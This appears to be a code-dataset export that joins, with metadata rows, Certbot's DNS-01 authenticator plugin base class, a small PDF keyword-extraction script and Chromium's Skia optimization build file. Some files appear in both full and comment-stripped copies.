def prepare(self): # pylint: disable=missing-docstring
pass
def perform(self, achalls): # pylint: disable=missing-docstring
self._setup_credentials()
self._attempt_cleanup = True
responses = []
for achall in achalls:
domain = achall.domain
validation_domain_name = achall.validation_domain_name(domain)
validation = achall.validation(achall.account_key)
self._perform(domain, validation_domain_name, validation)
responses.append(achall.response(achall.account_key))
# DNS updates take time to propagate and checking to see if the update has occurred is not
# reliable (the machine this code is running on might be able to see an update before
# the ACME server). So: we sleep for a short amount of time we believe to be long enough.
logger.info("Waiting %d seconds for DNS changes to propagate",
self.conf('propagation-seconds'))
sleep(self.conf('propagation-seconds'))
return responses
def cleanup(self, achalls): # pylint: disable=missing-docstring
if self._attempt_cleanup:
for achall in achalls:
domain = achall.domain
validation_domain_name = achall.validation_domain_name(domain)
validation = achall.validation(achall.account_key)
self._cleanup(domain, validation_domain_name, validation)
@abc.abstractmethod
def _setup_credentials(self): # pragma: no cover
"""
Establish credentials, prompting if necessary.
"""
raise NotImplementedError()
@abc.abstractmethod
def _perform(self, domain, validation_domain_name, validation): # pragma: no cover
"""
Performs a dns-01 challenge by creating a DNS TXT record.
:param str domain: The domain being validated.
:param str validation_domain_name: The validation record domain name.
:param str validation: The validation record content.
:raises errors.PluginError: If the challenge cannot be performed
"""
raise NotImplementedError()
@abc.abstractmethod
def _cleanup(self, domain, validation_domain_name, validation): # pragma: no cover
"""
Deletes the DNS TXT record which would have been created by `_perform_achall`.
Fails gracefully if no such record exists.
:param str domain: The domain being validated.
:param str validation_domain_name: The validation record domain name.
:param str validation: The validation record content.
"""
raise NotImplementedError()
def _configure(self, key, label):
"""
Ensure that a configuration value is available.
If necessary, prompts the user and stores the result.
:param str key: The configuration key.
:param str label: The user-friendly label for this piece of information.
"""
configured_value = self.conf(key)
if not configured_value:
new_value = self._prompt_for_data(label)
setattr(self.config, self.dest(key), new_value)
def _configure_file(self, key, label, validator=None):
"""
Ensure that a configuration value is available for a path.
If necessary, prompts the user and stores the result.
:param str key: The configuration key.
:param str label: The user-friendly label for this piece of information.
"""
configured_value = self.conf(key)
if not configured_value:
new_value = self._prompt_for_file(label, validator)
setattr(self.config, self.dest(key), os.path.abspath(os.path.expanduser(new_value)))
def _configure_credentials(self, key, label, required_variables=None):
"""
As `_configure_file`, but for a credential configuration file.
If necessary, prompts the user and stores the result.
Always stores absolute paths to avoid issues during renewal.
:param str key: The configuration key.
:param str label: The user-friendly label for this piece of information.
:param dict required_variables: Map of variable which must be present to error to display.
"""
def __validator(filename):
if required_variables:
CredentialsConfiguration(filename, self.dest).require(required_variables)
self._configure_file(key, label, __validator)
credentials_configuration = CredentialsConfiguration(self.conf(key), self.dest)
if required_variables:
credentials_configuration.require(required_variables)
return credentials_configuration
@staticmethod
def _prompt_for_data(label):
"""
Prompt the user for a piece of information.
:param str label: The user-friendly label for this piece of information.
:returns: The user's response (guaranteed non-empty).
:rtype: str
"""
def __validator(i):
if not i:
raise errors.PluginError('Please enter your {0}.'.format(label))
code, response = ops.validated_input(
__validator,
'Input your {0}'.format(label),
force_interactive=True)
if code == display_util.OK:
return response
else:
raise errors.PluginError('{0} required to proceed.'.format(label))
@staticmethod
def _prompt_for_file(label, validator=None):
"""
Prompt the user for a path.
:param str label: The user-friendly label for the file.
:param callable validator: A method which will be called to validate the supplied input
after it has been validated to be a non-empty path to an existing file. Should throw a
`~certbot.errors.PluginError` to indicate any issue.
:returns: The user's response (guaranteed to exist).
:rtype: str
"""
def __validator(filename):
if not filename:
raise errors.PluginError('Please enter a valid path to your {0}.'.format(label))
filename = os.path.expanduser(filename)
validate_file(filename)
if validator:
validator(filename)
code, response = ops.validated_directory(
__validator,
'Input the path to your {0}'.format(label),
force_interactive=True)
if code == display_util.OK:
return response
else:
raise errors.PluginError('{0} required to proceed.'.format(label))
class CredentialsConfiguration(object):
"""Represents a user-supplied filed which stores API credentials."""
def __init__(self, filename, mapper=lambda x: x):
"""
:param str filename: A path to the configuration file.
:param callable mapper: A transformation to apply to configuration key names
:raises errors.PluginError: If the file does not exist or is not a valid format.
"""
validate_file_permissions(filename)
try:
self.confobj = configobj.ConfigObj(filename)
except configobj.ConfigObjError as e:
logger.debug("Error parsing credentials configuration: %s", e, exc_info=True)
raise errors.PluginError("Error parsing credentials configuration: {0}".format(e))
self.mapper = mapper
def require(self, required_variables):
"""Ensures that the supplied set of variables are all present in the file.
:param dict required_variables: Map of variable which must be present to error to display.
:raises errors.PluginError: If one or more are missing.
"""
messages = []
for var in required_variables:
if not self._has(var):
messages.append('Property "{0}" not found (should be {1}).'
.format(self.mapper(var), required_variables[var]))
elif not self._get(var):
messages.append('Property "{0}" not set (should be {1}).'
.format(self.mapper(var), required_variables[var]))
if messages:
raise errors.PluginError(
'Missing {0} in credentials configuration file {1}:\n * {2}'.format(
'property' if len(messages) == 1 else 'properties',
self.confobj.filename,
'\n * '.join(messages)
)
)
def conf(self, var):
"""Find a configuration value for variable `var`, as transformed by `mapper`.
:param str var: The variable to get.
:returns: The value of the variable.
:rtype: str
"""
return self._get(var)
def _has(self, var):
return self.mapper(var) in self.confobj
def _get(self, var):
return self.confobj.get(self.mapper(var))
def validate_file(filename):
"""Ensure that the specified file exists."""
if not os.path.exists(filename):
raise errors.PluginError('File not found: {0}'.format(filename))
if not os.path.isfile(filename):
raise errors.PluginError('Path is not a file: {0}'.format(filename))
def validate_file_permissions(filename):
"""Ensure that the specified file exists and warn about unsafe permissions."""
validate_file(filename)
permissions = stat.S_IMODE(os.stat(filename).st_mode)
if permissions & stat.S_IRWXO:
logger.warning('Unsafe permissions on credentials configuration file: %s', filename)
def base_domain_name_guesses(domain):
"""Return a list of progressively less-specific domain names.
One of these will probably be the domain name known to the DNS provider.
:Example:
>>> base_domain_name_guesses('foo.bar.baz.example.com')
['foo.bar.baz.example.com', 'bar.baz.example.com', 'baz.example.com', 'example.com', 'com']
:param str domain: The domain for which to return guesses.
:returns: The a list of less specific domain names.
:rtype: list
"""
fragments = domain.split('.')
return ['.'.join(fragments[i:]) for i in range(0, len(fragments))]
| 35.404321 | 107 | 0.648418 |
import abc
import logging
import os
import stat
from time import sleep
import configobj
import zope.interface
from acme import challenges
from certbot import errors
from certbot import interfaces
from certbot.display import ops
from certbot.display import util as display_util
from certbot.plugins import common
logger = logging.getLogger(__name__)
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class DNSAuthenticator(common.Plugin):
def __init__(self, config, name):
super(DNSAuthenticator, self).__init__(config, name)
self._attempt_cleanup = False
@classmethod
def add_parser_arguments(cls, add, default_propagation_seconds=10):
add('propagation-seconds',
default=default_propagation_seconds,
type=int,
help='The number of seconds to wait for DNS to propagate before asking the ACME server '
'to verify the DNS record.')
def get_chall_pref(self, unused_domain):
return [challenges.DNS01]
def prepare(self):
pass
def perform(self, achalls):
self._setup_credentials()
self._attempt_cleanup = True
responses = []
for achall in achalls:
domain = achall.domain
validation_domain_name = achall.validation_domain_name(domain)
validation = achall.validation(achall.account_key)
self._perform(domain, validation_domain_name, validation)
responses.append(achall.response(achall.account_key))
logger.info("Waiting %d seconds for DNS changes to propagate",
self.conf('propagation-seconds'))
sleep(self.conf('propagation-seconds'))
return responses
def cleanup(self, achalls):
if self._attempt_cleanup:
for achall in achalls:
domain = achall.domain
validation_domain_name = achall.validation_domain_name(domain)
validation = achall.validation(achall.account_key)
self._cleanup(domain, validation_domain_name, validation)
@abc.abstractmethod
def _setup_credentials(self):
raise NotImplementedError()
@abc.abstractmethod
def _perform(self, domain, validation_domain_name, validation):
raise NotImplementedError()
@abc.abstractmethod
def _cleanup(self, domain, validation_domain_name, validation):
raise NotImplementedError()
def _configure(self, key, label):
configured_value = self.conf(key)
if not configured_value:
new_value = self._prompt_for_data(label)
setattr(self.config, self.dest(key), new_value)
def _configure_file(self, key, label, validator=None):
configured_value = self.conf(key)
if not configured_value:
new_value = self._prompt_for_file(label, validator)
setattr(self.config, self.dest(key), os.path.abspath(os.path.expanduser(new_value)))
def _configure_credentials(self, key, label, required_variables=None):
def __validator(filename):
if required_variables:
CredentialsConfiguration(filename, self.dest).require(required_variables)
self._configure_file(key, label, __validator)
credentials_configuration = CredentialsConfiguration(self.conf(key), self.dest)
if required_variables:
credentials_configuration.require(required_variables)
return credentials_configuration
@staticmethod
def _prompt_for_data(label):
def __validator(i):
if not i:
raise errors.PluginError('Please enter your {0}.'.format(label))
code, response = ops.validated_input(
__validator,
'Input your {0}'.format(label),
force_interactive=True)
if code == display_util.OK:
return response
else:
raise errors.PluginError('{0} required to proceed.'.format(label))
@staticmethod
def _prompt_for_file(label, validator=None):
def __validator(filename):
if not filename:
raise errors.PluginError('Please enter a valid path to your {0}.'.format(label))
filename = os.path.expanduser(filename)
validate_file(filename)
if validator:
validator(filename)
code, response = ops.validated_directory(
__validator,
'Input the path to your {0}'.format(label),
force_interactive=True)
if code == display_util.OK:
return response
else:
raise errors.PluginError('{0} required to proceed.'.format(label))
class CredentialsConfiguration(object):
def __init__(self, filename, mapper=lambda x: x):
validate_file_permissions(filename)
try:
self.confobj = configobj.ConfigObj(filename)
except configobj.ConfigObjError as e:
logger.debug("Error parsing credentials configuration: %s", e, exc_info=True)
raise errors.PluginError("Error parsing credentials configuration: {0}".format(e))
self.mapper = mapper
def require(self, required_variables):
messages = []
for var in required_variables:
if not self._has(var):
messages.append('Property "{0}" not found (should be {1}).'
.format(self.mapper(var), required_variables[var]))
elif not self._get(var):
messages.append('Property "{0}" not set (should be {1}).'
.format(self.mapper(var), required_variables[var]))
if messages:
raise errors.PluginError(
'Missing {0} in credentials configuration file {1}:\n * {2}'.format(
'property' if len(messages) == 1 else 'properties',
self.confobj.filename,
'\n * '.join(messages)
)
)
def conf(self, var):
return self._get(var)
def _has(self, var):
return self.mapper(var) in self.confobj
def _get(self, var):
return self.confobj.get(self.mapper(var))
def validate_file(filename):
if not os.path.exists(filename):
raise errors.PluginError('File not found: {0}'.format(filename))
if not os.path.isfile(filename):
raise errors.PluginError('Path is not a file: {0}'.format(filename))
def validate_file_permissions(filename):
validate_file(filename)
permissions = stat.S_IMODE(os.stat(filename).st_mode)
if permissions & stat.S_IRWXO:
logger.warning('Unsafe permissions on credentials configuration file: %s', filename)
def base_domain_name_guesses(domain):
fragments = domain.split('.')
return ['.'.join(fragments[i:]) for i in range(0, len(fragments))]
| true | true |
f7190714a40b489705d1a2f0f757254156b06f7f | 1,247 | py | Python | crawler/pdf.py | mental689/paddict | 493268b62531c698687d42416edf61c602250133 | [
"MIT"
] | 1 | 2019-06-22T10:28:21.000Z | 2019-06-22T10:28:21.000Z | crawler/pdf.py | mental689/paddict | 493268b62531c698687d42416edf61c602250133 | [
"MIT"
] | 4 | 2020-09-05T01:48:18.000Z | 2022-03-02T04:29:25.000Z | crawler/pdf.py | mental689/paddict | 493268b62531c698687d42416edf61c602250133 | [
"MIT"
] | null | null | null | #import PyPDF2 # PyPDF2 extracts texts from PDF markup. We found that it worked relatively poor with CVPR papers. Spaces between words are often omitted in the outputs.
import textract # textract uses external OCR command "tesseract" to extract texts. The workflow is to first convert pdf files to ppm images and then apply OCR to extract texts.
from nltk.tokenize import word_tokenize
import os, re
import django
django.setup()
from papers.settings import BASE_DIR
import xml.etree.ElementTree as ET
def get_stopwords():
with open("{}/static/stopwords.txt".format(BASE_DIR)) as f:
stopwords = [w.strip() for w in f.readlines()]
return stopwords
STOPWORDS = get_stopwords()
def extract_keywords_from_pdf(pdf_file):
text = str(textract.process(pdf_file, method='tesseract', language='eng', layout="layout"))
tokens = word_tokenize(text)
tokens =[tk.strip() for tk in tokens]
tokens =[tk.replace('-\\n','') for tk in tokens]
words = [w for w in tokens if w not in STOPWORDS]
words = [re.sub('[^0-9a-zA-Z]+','',w).lower() for w in words]
words = [w for w in words if len(w) > 2]
return words
def parse_cermine_output(cermine_file):
tree = ET.parse(cermine_file)
root = tree.getroot()
| 34.638889 | 176 | 0.715317 | ee.ElementTree as ET
def get_stopwords():
with open("{}/static/stopwords.txt".format(BASE_DIR)) as f:
stopwords = [w.strip() for w in f.readlines()]
return stopwords
STOPWORDS = get_stopwords()
def extract_keywords_from_pdf(pdf_file):
text = str(textract.process(pdf_file, method='tesseract', language='eng', layout="layout"))
tokens = word_tokenize(text)
tokens =[tk.strip() for tk in tokens]
tokens =[tk.replace('-\\n','') for tk in tokens]
words = [w for w in tokens if w not in STOPWORDS]
words = [re.sub('[^0-9a-zA-Z]+','',w).lower() for w in words]
words = [w for w in words if len(w) > 2]
return words
def parse_cermine_output(cermine_file):
tree = ET.parse(cermine_file)
root = tree.getroot()
| true | true |
f71907581411d3f59e6caa7fc154349051e25a21 | 11,381 | gyp | Python | skia/skia_library_opts.gyp | shaochangbin/chromium-crosswalk | 634d34e4cf82b4f7400357c53ec12efaffe94add | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2 | 2019-01-16T03:57:28.000Z | 2021-01-23T15:29:45.000Z | skia/skia_library_opts.gyp | shaochangbin/chromium-crosswalk | 634d34e4cf82b4f7400357c53ec12efaffe94add | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | skia/skia_library_opts.gyp | shaochangbin/chromium-crosswalk | 634d34e4cf82b4f7400357c53ec12efaffe94add | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 | 2017-03-15T13:21:38.000Z | 2017-03-15T13:21:38.000Z | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This gyp file contains the platform-specific optimizations for Skia
{
'targets': [
# Due to an unfortunate intersection of lameness between gcc and gyp,
# we have to build the *_SSE2.cpp files in a separate target. The
# gcc lameness is that, in order to compile SSE2 intrinsics code, it
# must be passed the -msse2 flag. However, with this flag, it may
# emit SSE2 instructions even for scalar code, such as the CPUID
# test used to test for the presence of SSE2. So that, and all other
# code must be compiled *without* -msse2. The gyp lameness is that it
# does not allow file-specific CFLAGS, so we must create this extra
# target for those files to be compiled with -msse2.
#
# This is actually only a problem on 32-bit Linux (all Intel Macs have
# SSE2, Linux x86_64 has SSE2 by definition, and MSC will happily emit
# SSE2 from instrinsics, which generating plain ol' 386 for everything
# else). However, to keep the .gyp file simple and avoid platform-specific
# build breakage, we do this on all platforms.
# For about the same reason, we need to compile the ARM opts files
# separately as well.
{
'target_name': 'skia_opts',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'conditions': [
[ 'os_posix == 1 and OS != "mac" and OS != "android" and \
target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'cflags': [
'-msse2',
],
}],
[ 'target_arch != "arm" and target_arch != "mipsel" and \
target_arch != "arm64"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRect_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkUtils_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkBitmapFilter_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_SSE2.cpp',
],
'dependencies': [
'skia_opts_ssse3',
],
}],
# TODO(rmcilroy): Add neon support for arm64 - http://crbug.com/354405
[ 'target_arch == "arm"', {
'conditions': [
[ 'arm_version >= 7 and arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
[ 'arm_version >= 7 and arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
[ 'arm_version >= 7 and (arm_neon == 1 or arm_neon_optional == 1)', {
'cflags': [
# The neon assembly contains conditional instructions which
# aren't enclosed in an IT block. The assembler complains
# without this option.
# See #86592.
'-Wa,-mimplicit-it=always',
],
'dependencies': [
'skia_opts_neon',
]
}],
],
# The assembly uses the frame pointer register (r7 in Thumb/r11 in
# ARM), the compiler doesn't like that. Explicitly remove the
# -fno-omit-frame-pointer flag for Android, as that gets added to all
# targets via common.gypi.
'cflags!': [
'-fno-omit-frame-pointer',
'-marm',
'-mapcs-frame',
],
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_arm.cpp',
],
}],
[ 'target_arch == "arm" and (arm_version < 7 or (arm_neon == 0 and arm_neon_optional == 1))', {
'sources': [
'../third_party/skia/src/opts/memset.arm.S',
],
}],
[ 'target_arch == "arm" and arm_version < 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm" and arm_version >= 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.h',
'../third_party/skia/src/opts/SkBlurImage_opts_arm.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_arm.cpp',
'../third_party/skia/src/opts/SkUtils_opts_arm.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
],
}],
[ 'target_arch == "mipsel"',{
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm64"',{
# TODO(rmcilroy): Update this once http://crrev.com/143423004/ lands.
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
],
},
# For the same lame reasons as what is done for skia_opts, we have to
# create another target specifically for SSSE3 code as we would not want
# to compile the SSE2 code with -mssse3 which would potentially allow
# gcc to generate SSSE3 code.
{
'target_name': 'skia_opts_ssse3',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'conditions': [
[ 'OS in ["linux", "freebsd", "openbsd", "solaris", "android"]', {
'cflags': [
'-mssse3',
],
}],
[ 'OS == "mac"', {
'xcode_settings': {
'GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS': 'YES',
},
}],
[ 'OS == "win"', {
'include_dirs': [
'config/win',
],
'direct_dependent_settings': {
'include_dirs': [
'config/win',
],
},
}],
[ 'target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSSE3.cpp',
],
}],
],
},
{
'target_name': 'skia_opts_none',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
},
],
'conditions': [
# NEON code must be compiled with -mfpu=neon which also affects scalar
# code. To support dynamic NEON code paths, we need to build all
# NEON-specific sources in a separate static library. The situation
# is very similar to the SSSE3 one.
['target_arch == "arm" and (arm_neon == 1 or arm_neon_optional == 1)', {
'targets': [
{
'target_name': 'skia_opts_neon',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'cflags!': [
'-fno-omit-frame-pointer',
'-mfpu=vfp', # remove them all, just in case.
'-mfpu=vfpv3',
'-mfpu=vfpv3-d16',
],
'cflags': [
'-mfpu=neon',
'-fomit-frame-pointer',
],
'ldflags': [
'-march=armv7-a',
'-Wl,--fix-cortex-a8',
],
'sources': [
'../third_party/skia/src/opts/memset16_neon.S',
'../third_party/skia/src/opts/memset32_neon.S',
'../third_party/skia/src/opts/SkBitmapProcState_arm_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrixProcs_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_clamp_neon.h',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_repeat_neon.h',
'../third_party/skia/src/opts/SkBlitMask_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_neon.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_neon.cpp',
],
'conditions': [
['arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
['arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
],
},
],
}],
],
}
| 39.517361 | 103 | 0.549864 |
{
'targets': [
# else). However, to keep the .gyp file simple and avoid platform-specific
# build breakage, we do this on all platforms.
# For about the same reason, we need to compile the ARM opts files
# separately as well.
{
'target_name': 'skia_opts',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'conditions': [
[ 'os_posix == 1 and OS != "mac" and OS != "android" and \
target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'cflags': [
'-msse2',
],
}],
[ 'target_arch != "arm" and target_arch != "mipsel" and \
target_arch != "arm64"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRect_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkUtils_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkBitmapFilter_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_SSE2.cpp',
],
'dependencies': [
'skia_opts_ssse3',
],
}],
# TODO(rmcilroy): Add neon support for arm64 - http://crbug.com/354405
[ 'target_arch == "arm"', {
'conditions': [
[ 'arm_version >= 7 and arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
[ 'arm_version >= 7 and arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
[ 'arm_version >= 7 and (arm_neon == 1 or arm_neon_optional == 1)', {
'cflags': [
# The neon assembly contains conditional instructions which
# aren't enclosed in an IT block. The assembler complains
'-Wa,-mimplicit-it=always',
],
'dependencies': [
'skia_opts_neon',
]
}],
],
# -fno-omit-frame-pointer flag for Android, as that gets added to all
# targets via common.gypi.
'cflags!': [
'-fno-omit-frame-pointer',
'-marm',
'-mapcs-frame',
],
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_arm.cpp',
],
}],
[ 'target_arch == "arm" and (arm_version < 7 or (arm_neon == 0 and arm_neon_optional == 1))', {
'sources': [
'../third_party/skia/src/opts/memset.arm.S',
],
}],
[ 'target_arch == "arm" and arm_version < 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm" and arm_version >= 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.h',
'../third_party/skia/src/opts/SkBlurImage_opts_arm.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_arm.cpp',
'../third_party/skia/src/opts/SkUtils_opts_arm.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
],
}],
[ 'target_arch == "mipsel"',{
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm64"',{
# TODO(rmcilroy): Update this once http://crrev.com/143423004/ lands.
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
],
},
# For the same lame reasons as what is done for skia_opts, we have to
# create another target specifically for SSSE3 code as we would not want
# to compile the SSE2 code with -mssse3 which would potentially allow
# gcc to generate SSSE3 code.
{
'target_name': 'skia_opts_ssse3',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'conditions': [
[ 'OS in ["linux", "freebsd", "openbsd", "solaris", "android"]', {
'cflags': [
'-mssse3',
],
}],
[ 'OS == "mac"', {
'xcode_settings': {
'GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS': 'YES',
},
}],
[ 'OS == "win"', {
'include_dirs': [
'config/win',
],
'direct_dependent_settings': {
'include_dirs': [
'config/win',
],
},
}],
[ 'target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSSE3.cpp',
],
}],
],
},
{
'target_name': 'skia_opts_none',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
},
],
'conditions': [
# NEON code must be compiled with -mfpu=neon which also affects scalar
# code. To support dynamic NEON code paths, we need to build all
# NEON-specific sources in a separate static library. The situation
# is very similar to the SSSE3 one.
['target_arch == "arm" and (arm_neon == 1 or arm_neon_optional == 1)', {
'targets': [
{
'target_name': 'skia_opts_neon',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'cflags!': [
'-fno-omit-frame-pointer',
'-mfpu=vfp', # remove them all, just in case.
'-mfpu=vfpv3',
'-mfpu=vfpv3-d16',
],
'cflags': [
'-mfpu=neon',
'-fomit-frame-pointer',
],
'ldflags': [
'-march=armv7-a',
'-Wl,--fix-cortex-a8',
],
'sources': [
'../third_party/skia/src/opts/memset16_neon.S',
'../third_party/skia/src/opts/memset32_neon.S',
'../third_party/skia/src/opts/SkBitmapProcState_arm_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrixProcs_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_clamp_neon.h',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_repeat_neon.h',
'../third_party/skia/src/opts/SkBlitMask_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_arm_neon.cpp',
